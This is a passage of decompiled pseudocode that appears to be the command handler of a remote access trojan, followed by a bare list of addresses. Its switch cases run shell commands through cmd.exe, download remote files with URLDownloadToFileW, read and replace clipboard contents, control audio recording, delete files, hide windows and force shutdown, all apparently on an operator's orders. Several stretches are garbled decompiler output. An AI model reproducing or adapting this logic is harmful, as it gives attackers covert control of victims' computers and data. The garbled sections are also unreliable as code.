								__ecx =  &_v212;
								__eax = L00407304(__ebx, __ecx, __esi);
								goto L125;
							case 0x12:
								goto L125;
						}
					}
					goto L125;
				} else {
					if(_t400 == 0) {
						L130();
						_v348 = E00436769(_t237, L00401F95(L00401E49( &_v420, _t360, __eflags, 2)));
						_v344 =  &_v120;
						E004139B3(__ebx, _t360, 0x46c238, __eflags,  &_v348);
						_t120 = E0040805A() - 1; // -1
						_t378 = _t120;
						_t244 = L00401E49( &_v428, _t360, __eflags, 3);
						_t394 = _t390 - 0x18;
						E004020EC(_t294, _t394, _t360, __eflags, _t244);
						_t246 = L00401E49( &_v436, _t360, __eflags, 2);
						E004020EC(_t294, _t394 - 0x18, _t360, __eflags, _t246);
						E0040427F(_t294, _t394, L00401F95(L00401E49( &_v444, _t360, __eflags, 1)));
						E0040427F(_t294, _t394 - 0xffffffffffffffe8, L00401F95(L00401E49( &_v452, _t360, __eflags, 0)));
						E004077EC( &_v156, _t360, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00408007( &_v420,  *((intOrPtr*)(L00407FE6(E0040806E( &_v156,  &_v504),  &_v500, _t378))));
						}
						L00407FDE(_t294,  &_v212, _t378);
						goto L125;
					} else {
						_t379 = _t375 - 1;
						if(_t379 > 0x33) {
							L125:
							_t163 =  &_v420; // 0x404538
							L00401E74(_t163, _t360);
							E00401FC7();
							E00401FC7();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t379 * 4 +  &M004133F5))) {
								case 0:
									_t263 = E00417226(0,  &_v368, GetTickCount());
									_t265 = E00417226(0,  &_v336, E004171D6( &_v368));
									_t266 = E0041719C( &_v140); // executed
									_t267 = E0041739C(0,  &_v164, _t266);
									_t369 = L00402F93(0,  &_v404, L00402F1D( &_v264, L00402F93(0,  &_v240, L00402F1D( &_v216, L00402FB7( &_v192, L00401E49( &_v420, _t266, _t401, 0), 0x46c238), _t267), _t401, 0x46c238), _t265), _t401, 0x46c238);
									L00402F1D(_t390 - 0x18, _t273, _t263);
									_push(0x4c);
									E00404AA4(0, 0x46c780, _t273, _t401); // executed
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401FC7();
									E00401FC7();
									L00401EF0();
									E00401FC7();
									E00401FC7();
									_t287 = E00436769(_t285, L00401F95(L00401E49( &_v452, _t273, _t401, 1)));
									if(_t287 == 0) {
										L00401E49( &_v440, _t369, __eflags, 0);
										_t360 = "0";
										_t289 = E00405A6F("0");
										__eflags = _t289;
										if(_t289 != 0) {
											_push(0);
											_t358 = 0x46c780;
											goto L10;
										}
									} else {
										_t360 = _t287 + _t287;
										if(E0040484A(0x46c780) == 0) {
											E00404E9A(0x46c780, _t360, 1);
										} else {
											L00404FAD(0x46c238, _t360);
										}
									}
									goto L125;
								case 1:
									_push(0);
									__ecx = 0x46c780;
									L10:
									E0040511B(_t358, 0x46c238);
									goto L125;
								case 2:
									__ecx =  &_v368;
									__eax = L00417C05(__ebx,  &_v368);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E0041739C(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x46c780;
									__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
									__ecx =  &_v396;
									goto L106;
								case 3:
									goto L125;
								case 4:
									 &_v376 = GetCurrentProcessId();
									__eax = E0043BACE(__ecx, __eax,  &_v376, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v376;
									__esi = __esp;
									__ecx =  &_v336;
									__edx = E0040D211(__ebx,  &_v336, __eflags);
									__ecx =  &_v368;
									__edx = __eax;
									__ecx = __esi;
									__eax = E00405343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
									_push(0x4f);
									L124:
									__ecx = 0x46c780;
									__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
									__ecx =  &_v396;
									__eax = E00401FC7();
									__ecx =  &_v364;
									__eax = E00401FC7();
									goto L125;
								case 5:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__ecx = __eax;
									__eax = E004171F9(__ecx);
									goto L125;
								case 6:
									L20:
									__eax = E00413909(__edx);
									goto L125;
								case 7:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__eax = CloseWindow(__eax);
									goto L125;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags);
									__eax = L00401F95(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L125;
								case 0xa:
									__eax =  &_v372;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v372);
									__ecx = _v376;
									__eax = E004171F9(_v376);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx =  &_v340;
									__eax = E0040427F(0,  &_v340, __eax);
									__edx = L"/C ";
									__ecx =  &_v376;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v376;
									__eax = L00401EF0();
									__ecx =  &_v344;
									goto L106;
								case 0xc:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 1);
									__ecx = 0x46c2d0;
									__eax = L00401FAD(0x46c2d0, __eax);
									__eflags =  *0x46bae3 - __bl;
									if(__eflags == 0) {
										__ecx =  &_v420;
										__eax = L00401E49( &_v420, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E004055EA();
										goto L102;
									}
									goto L125;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									L00401F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L125;
								case 0xe:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c868;
									__eax = L00401FAD(0x46c868, __eax);
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 3);
									__eax = L00401F95(__ecx);
									__esi = __eax;
									__eax = E0041451F(__edx, __edi, __eax);
									__ecx =  &_v432;
									__ecx = L00401E49( &_v432, __edx, __eflags, 2);
									__eax = L00401F95(__ecx);
									__eax = E00436769(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v436;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = L00401E49( &_v436, __edx, _t57, 1);
									L00401F95(__ecx) = E00436769(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = E0041459C(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x46bd6a = 1;
									__eax = __eax + 0x46bd6a;
									__ecx = __ecx + __ebp;
									asm("wait");
									__eax = __eax |  *__eax;
									 *__edx =  *__edx + __ch;
									__eflags =  *__edx;
									goto L125;
								case 0x10:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = E0040857D(0x46c350, __edx);
									goto L125;
								case 0x11:
									__ecx = 0x46c350;
									__eax = E004093AD(0x46c350);
									goto L125;
								case 0x12:
									__ecx = 0x46c350;
									__eax = E0040951E(__ebx, 0x46c350);
									goto L125;
								case 0x13:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c3e0;
									__eax = L00401FAD(0x46c3e0, __eax);
									__ecx = 0x46c350;
									goto L33;
								case 0x14:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__eflags = __eax;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350; // executed
									__eax = E00408FF0(0x46c350, __edx); // executed
									goto L36;
								case 0x15:
									__esi = 0x46c350;
									__ecx = 0x46c350;
									__eax = L00409D36(0x46c350);
									__ecx = 0x46c350;
									L33:
									__eax = L00408E9E(__ebx, __ecx);
									goto L125;
								case 0x16:
									__eflags =  *0x46baf9 - __bl;
									if( *0x46baf9 == __bl) {
										__edx = 0;
										__cl = 0;
										__eax = E0040A679(0);
									}
									goto L125;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c1b8;
									__eax = L00401FAD(0x46c1b8, __eax);
									__ecx = 0x46c1d0;
									__eax = E0040498B(0x46c1d0);
									__esp = __esp - 0x10;
									__esi = 0x46bacc;
									__edi = __esp;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi = 0x46c1d0;
									__ecx = 0x46c1d0;
									__eax = E00404A08(__edx);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x46c1b8);
									__eflags =  *0x46baaa - __bl; // 0x0
									if(__eflags == 0) {
										__eax = E004020EC(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020EC(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00404AA4(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00404BBE(__ecx, __edx, 0x404538, __ebx);
									goto L125;
								case 0x18:
									__eax =  *0x46bac0();
									__ecx = 0x46c1d0;
									__eax = E00404E0B(0x46c1d0);
									goto L125;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v420;
									 *0x46ba74 = __bl;
									__eax = L00401E49( &_v420, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 2);
									__eax = L00401F95(__ecx);
									_push(__eax);
									__ecx =  &_v432;
									__ecx = L00401E49( &_v432, __edx, __eflags, 1);
									__eax = L00401F95(__ecx);
									__eax = E00436769(__ecx, __eax);
									__ecx =  &_v436;
									__esi = __eax;
									__ecx = L00401E49( &_v436, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__eax = E00436769(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E004016F8(__ecx, __edx, __edi, __esi);
									goto L125;
								case 0x1a:
									_push( *0x46bab8);
									__eax = __eax ^ 0x0046bab8;
									 *0x46ba74 = 1;
									waveInStop(??) = waveInClose( *0x46bab8);
									goto L125;
								case 0x1b:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__eax = 0x46bd6c + __eax;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__eax = L00401E49( &_v428, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax); // executed
									__eax = E00410188(__edx); // executed
									__esp = __esp + 0x30;
									L36:
									 *0x46bd6c =  *0x46bd6c - 1;
									goto L125;
								case 0x1c:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									L00401F95(__ecx) = DeleteFileW(__eax);
									goto L125;
								case 0x1d:
									__eax = E0041015B();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x46bd6c - __ebx;
										if( *0x46bd6c == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									__al = __al + __ch;
									__eflags = __al;
									E0040AD84();
									_pop(__ebx);
									__al = __al & 0x00000041;
									__cl = __cl + __ah;
									__eax = __eax & 0x2f500041;
									__ecx = __ecx + 1;
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									asm("les esi, [ebx]");
									__ecx = __ecx + 1;
									__dl = __dl + __ch;
									__eax = __eax & 0x262e0041;
									__ecx = __ecx + 1;
									__cl = __cl + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx + 0x26)) =  *((intOrPtr*)(__ebx + 0x26)) + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x26)) =  *((intOrPtr*)(__eax + 0x26)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi - 0x5cffbeda)) =  *((intOrPtr*)(__edi - 0x5cffbeda)) + __bl;
									__ecx = __ecx + 1;
									__bl = __bl + __bl;
									__ecx = __ecx + 1;
									 *0x77004127 =  *0x77004127 + __dh;
									asm("daa");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x1d004127)) =  *((intOrPtr*)(__eax + 0x1d004127)) + __ah;
									 *__ecx =  *__ecx - __al;
									 *__eax =  *__eax - __ebp;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x28)) =  *((intOrPtr*)(__esi + 0x28)) + __cl;
									__ecx = __ecx + 1;
									_a36 = _a36 + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax +  &_a61)) =  *((intOrPtr*)(__eax +  &_a61)) + __ch;
									 *((intOrPtr*)(__ecx - 0x3dffbed8)) =  *((intOrPtr*)(__ecx - 0x3dffbed8)) + __dl;
									 *__ecx =  *__ecx - __al;
									0x4133();
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									 *__eax =  *__eax >> __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x29)) =  *((intOrPtr*)(__eax + 0x29)) + __cl;
									__ecx = __ecx + 1;
									_a37 = _a37 + __bl;
									__ecx = __ecx + 1;
									__cl = __cl + __bl;
									 *__ecx =  *__ecx - __eax;
									asm("std");
									 *__ecx =  *__ecx - __eax;
									__eflags = __al - 0x2a;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x2a)) =  *((intOrPtr*)(__edx + 0x2a)) + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx +  &_a61)) =  *((intOrPtr*)(__edx +  &_a61)) + __bh;
									 *((intOrPtr*)(__esi + 0x1c00412a)) =  *((intOrPtr*)(__esi + 0x1c00412a)) + __cl;
									__eax = __eax -  *__ecx;
									asm("invalid");
									__ecx = __ecx + 1;
									__cl = __cl + __ah;
									__eax = __eax -  *__ecx;
									 *0x2cee0041 = __ch;
									__ecx = __ecx + 1;
									_a41 = _a41 + __ch;
									__ecx = __ecx + 1;
									__dl = __dl + __ch;
									__eax = __eax - 0x2e1e0041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x2e)) =  *((intOrPtr*)(__esi + 0x2e)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x2e)) =  *((intOrPtr*)(__eax + 0x2e)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x47ffbed2)) =  *((intOrPtr*)(__eax - 0x47ffbed2)) + __bl;
									__ecx = __ecx + 1;
									__al = __al + __bl;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __dh;
									asm("das");
									__ecx = __ecx + 1;
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									__eflags = __eax;
									if(__eax == 0) {
										__ecx = __ecx + 1;
										__ch = __ch + __ch;
										 *__ecx =  *__ecx ^ __al;
										asm("adc dh, [ecx]");
										__ecx = __ecx + 1;
										 *__edx =  *__edx + __dl;
										__al = __al ^  *__ecx;
										__dh =  *__edx;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edx - 0x35ffbece)) =  *((intOrPtr*)(__edx - 0x35ffbece)) + __ch;
										 *__ecx =  *__ecx ^ __al;
										__edx = __edx - 1;
										__al = __al ^  *__ecx;
										_push(0x32);
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__eax + 0x33)) =  *((intOrPtr*)(__eax + 0x33)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edi + 0x33)) =  *((intOrPtr*)(__edi + 0x33)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__esi + 0x33)) =  *((intOrPtr*)(__esi + 0x33)) + __bl;
										__ecx = __ecx + 1;
										 *__ecx =  *__ecx + __ah;
										__eflags =  *__ecx;
									}
									__eax = __eax ^  *__ecx;
									asm("retf 0x4132");
									_a47 = _a47 + __ah;
									__ecx = __ecx + 1;
									__ah = __ah + __dl;
									__al = __al ^  *__ecx;
									__dh = __dh +  *__edx;
									__ecx = __ecx + 1;
									 *__ecx =  *__ecx + __cl;
									__al = __al ^  *__ecx;
									_t216 = __eax;
									__eax = __edi;
									__edi = _t216;
									 *__ecx =  *__ecx ^ __eax;
									asm("les esi, [ebx]");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
									asm("adc al, [ecx]");
									asm("adc al, [edx]");
									__edx = __edx +  *__edx;
									__al = __al + 5;
									_push(es);
									_pop(es);
									asm("adc dl, [edx]");
									asm("adc cl, [eax]");
									 *__edx =  *__edx | __ecx;
									asm("adc cl, [ebx]");
									__al = __al | 0x00000012;
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									__eax = __eax | 0x12100f0e;
									asm("adc dl, [edx]");
									asm("adc [esi-0x75], edx");
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									E0040484E(__ebx, __esi + 4, 0) = __esi;
									_pop(__esi);
									return __esi;
									goto L131;
								case 0x1f:
									__eax = E0040B488(__ebx, __eflags);
									goto L125;
								case 0x20:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
									__eax = L00401F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0041805B( &_v408, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v408;
									_push(L00401EEB( &_v408));
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 2);
									__eax = L00401F95(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L58;
									}
									goto L105;
								case 0x21:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
									__eax = L00401F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0041805B( &_v408, __edx, __eax);
									__ecx =  &_v408;
									__eax = L00401EEB( &_v408);
									__ecx =  &_v428;
									__esi = __eax;
									__eax = L00401E49( &_v428, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = E00417A4E(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L58:
										__esp = __esp - 0x18;
										__eax =  &_v420;
										__ecx = __esp;
										E00407350(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B0E2();
										__esp = __esp + 0x18;
									}
									goto L105;
								case 0x22:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 2);
									__eax = L00401F95(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v424;
									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
									__eax = L00401F95(__eax);
									__ebx = 0;
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 0);
									L00401F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
									goto L125;
								case 0x23:
									__eax = E00413958();
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00405A6F(__edx);
									__ecx =  &_v424;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = L00401E49( &_v424, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00405A6F(__edx);
										__ecx =  &_v424;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = L00401E49( &_v424, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00405A6F(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v420;
												__esi = __eax;
												__eax = L00401E49( &_v420, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00405A6F(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v420;
													__eax = L00401E49( &_v420, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00405A6F(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L75;
													}
												} else {
													_push(0);
													_push(0);
													L75:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v420;
												__ecx = L00401E49( &_v420, __edx, __eflags, 1);
												__eax = L00401F95(__ecx);
												__eax = E00436769(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L70;
											}
										} else {
											__ecx = L00401E49( &_v424, __edx, __eflags, 1);
											__eax = L00401F95(__ecx);
											__eax = E00436769(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L70;
										}
									} else {
										__ecx = L00401E49( &_v424, __edx, __eflags, 1);
										__eax = L00401F95(__ecx);
										__eax = E00436769(__ecx, __eax);
										L70:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L125;
								case 0x24:
									L81:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x45f724 =  !=  ? __edi : 0x45f724;
										__ecx =  &_v400;
										__eax = E0040427F(__ebx,  &_v400,  !=  ? __edi : 0x45f724);
										__esp = __esp - 0x18;
										__edx =  &_v404;
										__ecx = __esp;
										__eax = E0041739C(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x46c780;
										__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
										L105:
										__ecx =  &_v400;
										L106:
										__eax = L00401EF0();
									}
									goto L125;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v420;
										__ecx = L00401E49( &_v420, __edx, __eflags, 0);
										__eax = E00402489();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v424;
										__esi = __eax;
										__ecx = L00401E49( &_v424, __edx, __eflags, 0);
										__eax = E00402489();
										__ecx =  &_v428;
										__ecx = L00401E49( &_v428, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L80;
									}
									goto L125;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L80:
										__eax = CloseClipboard();
										goto L81;
									}
									goto L125;
								case 0x27:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00402489();
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E49( &_v424, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E0040F69B();
									goto L125;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v420;
									_v404 = 0;
									_v408 = 0;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E00417111(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__edx = _v404;
										__ecx = _v408;
										E0040F69B() = L004394F1(_v408);
										L26:
										_pop(__ecx);
									}
									goto L125;
								case 0x29:
									__eax = E0040A732(__edx);
									goto L125;
								case 0x2a:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L00413CC0(__edx);
									goto L102;
								case 0x2b:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004117F1(__edx);
									goto L102;
								case 0x2c:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00405367(__edx);
									goto L102;
								case 0x2d:
									_push(__ecx);
									__esi = 0x46c560;
									__ecx = 0x46c560;
									__eax = E00402489();
									__ecx = 0x46c560;
									__eax = L00401F95(0x46c560);
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									E00402489() = __eax + 1;
									__ecx =  &_v424;
									__ecx = L00401E49( &_v424, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx = 0x46c518;
									__edx = L00401F95(0x46c518);
									__eax = E00410C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L102;
								case 0x2e:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L0040EE3B(__edx);
									goto L102;
								case 0x2f:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00415B9C(__edx);
									L102:
									goto L125;
							}
						}
					}
				}
				L131:
			}

0x004123b9
0x004123b9
0x004123b9
0x004123c9
0x004123cb
0x004123d3
0x004123db
0x004123f8
0x00412402
0x00412407
0x00412412
0x00412417
0x00412424
0x0041242d
0x00412437
0x0041243a
0x0041243c
0x004130ad
0x004130b3
0x004130b6
0x004130c3
0x00000000
0x004130ef
0x004130f8
0x004130fa
0x00413106
0x00413108
0x00000000
0x00000000
0x00413114
0x0041311d
0x0041311f
0x00413125
0x0041312d
0x00413131
0x00413138
0x0041313a
0x00413140
0x00413142
0x00413146
0x0041314c
0x00413150
0x00413157
0x0041315b
0x0041315d
0x00413162
0x00413165
0x00413168
0x0041316d
0x0041316f
0x00413174
0x00413177
0x00413180
0x00413182
0x00413184
0x00000000
0x00000000
0x00413214
0x0041321d
0x0041321f
0x00413227
0x00413230
0x00413232
0x0041323f
0x00000000
0x00000000
0x0041328c
0x00413290
0x00413295
0x00413298
0x004132a0
0x00000000
0x00000000
0x004132ac
0x004132b0
0x004132b5
0x004132b8
0x004132c0
0x00000000
0x00000000
0x004130db
0x004130e0
0x00000000
0x00000000
0x0041324c
0x00413250
0x00413255
0x00413258
0x00413260
0x00000000
0x00000000
0x0041326c
0x00413270
0x00413275
0x00413278
0x00413280
0x00000000
0x00000000
0x00413350
0x00000000
0x00000000
0x00413357
0x00000000
0x00000000
0x0041335e
0x00000000
0x00000000
0x00413321
0x00413323
0x0041332e
0x00413330
0x00413337
0x0041333b
0x0041333d
0x00413340
0x00413345
0x00413347
0x00413349
0x00000000
0x00000000
0x004132ca
0x00000000
0x00000000
0x00413365
0x0041336c
0x00413370
0x00413372
0x00413377
0x0041337a
0x0041337e
0x00413380
0x0041338d
0x0041338f
0x00413399
0x0041339b
0x0041339d
0x004133a3
0x00000000
0x00000000
0x004132d4
0x004132db
0x00413316
0x004132dd
0x004132dd
0x004132df
0x004132e4
0x004132f0
0x004132f6
0x004132f6
0x00000000
0x00000000
0x00413202
0x00000000
0x00000000
0x00413209
0x0041320b
0x0041320c
0x00000000
0x00000000
0x00413197
0x0041319e
0x004131a5
0x004131a9
0x004131ae
0x004131b1
0x004131b4
0x004131bb
0x004131bf
0x004131c4
0x004131c7
0x004131ca
0x004131d1
0x004131d5
0x004131da
0x004131dd
0x004131e0
0x004131e5
0x004131ec
0x004131f1
0x004131f8
0x00000000
0x00000000
0x00000000
0x00000000
0x004130c3
0x00000000
0x00412442
0x00412442
0x00412fbb
0x00412fd8
0x00412fe3
0x00412fed
0x00412ffd
0x00412ffd
0x00413000
0x00413005
0x0041300b
0x00413016
0x00413021
0x0041303e
0x0041305b
0x00413067
0x0041306c
0x00413074
0x00413097
0x00413097
0x004130a3
0x00000000
0x00412448
0x00412448
0x0041244c
0x004133c4
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed
0x00412452
0x00412454
0x00000000
0x00412467
0x00412481
0x0041248f
0x0041249d
0x004124f8
0x004124fc
0x00412507
0x0041250b
0x00412514
0x00412520
0x0041252c
0x00412538
0x00412544
0x00412550
0x0041255c
0x00412565
0x0041256e
0x00412586
0x0041258e
0x004125bb
0x004125c0
0x004125c7
0x004125cc
0x004125ce
0x004125d4
